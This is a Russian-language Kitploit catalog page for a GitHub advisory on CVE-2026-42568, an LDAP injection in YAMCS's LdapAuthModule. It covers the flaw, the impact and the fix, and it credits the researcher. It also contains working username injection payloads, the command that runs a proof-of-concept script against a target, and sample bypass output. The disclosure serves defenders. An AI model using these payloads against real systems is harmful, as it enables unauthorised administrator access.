Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42568 — Уязвимость LDAP-инъекции существует в org.yamcs.security.LdapAuthModule. Параметр username вставляется непосредственно в поисковые фильтры LDAP без экранирования согласно RFC 4515, что позволяет обойти аутентификацию. | Kitploit
Инструменты/GitHubGitHub/ex-cal1bur/cve-2026-42568
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

Уязвимость LDAP-инъекции существует в org.yamcs.security.LdapAuthModule. Параметр username вставляется непосредственно в поисковые фильтры LDAP без экранирования согласно RFC 4515, что позволяет обойти аутентификацию.

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-42568 — LDAP-инъекция YAMCS в LdapAuthModule

Краткое описание

Уязвимость LDAP-инъекции существует в org.yamcs.security.LdapAuthModule. Параметр имени пользователя вставляется непосредственно в фильтры поиска LDAP без экранирования по RFC 4515, что позволяет обойти аутентификацию.

ПолеЗначение
CVECVE-2026-42568
СерьёзностьСРЕДНЯЯ
CWECWE-90: Некорректная нейтрализация специальных элементов в LDAP-запросе
Затронутые версииyamcs-core < 5.12.7 (с настроенной LDAP-аутентификацией)
Исправлено вyamcs-core 5.12.7
КонсультацияGHSA-cqh3-jg8p-336j

Детали уязвимости

Корневая причина (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

При типичном userFilter = (uid={0}) вредоносное имя пользователя нарушает структуру фильтра:

Ввод: )(uid=))(|(uid=* Фильтр: (uid=)(uid=))(|(uid=*) Результат: Универсальное совпадение — аутентификация обойдена

Доказательство концепции

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

Ожидаемый вывод на уязвимом экземпляре (с настроенным LDAP):

root@kitploit:~
[1] Универсальный обход (любая учётная запись)
     Имя пользователя: *)(uid=*))(|(uid=*
     Пароль: anything
     Результат:   HTTP 200
     [!!!] АУТЕНТИФИКАЦИЯ ОБОЙДЕНА
     [!!!] Получен токен: eyJhbGciOiJSUzI1NiJ9...

Примечание: Эта уязвимость затрагивает только экземпляры YAMCS с настроенным LdapAuthModule. Установки по умолчанию, использующие встроенную аутентификацию, не затронуты.

Воздействие

Неаутентифицированный злоумышленник, имеющий доступ к серверу YAMCS, может полностью обойти аутентификацию при настроенном LDAP, получая доступ в качестве любого пользователя, включая администраторов.

Исправление

Обновитесь до yamcs-core >= 5.12.7.

Исправление применяет экранирование по RFC 4515 к имени пользователя перед построением LDAP-фильтра.

Хронология

ДатаСобытие
2026-05Уязвимость сообщена
2026-05-26Исправление выпущено в yamcs-core 5.12.7
2026-05-26Опубликовано публичное уведомление

Исследователь

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • Blog: https://thedumpster.es
Скачать инструмент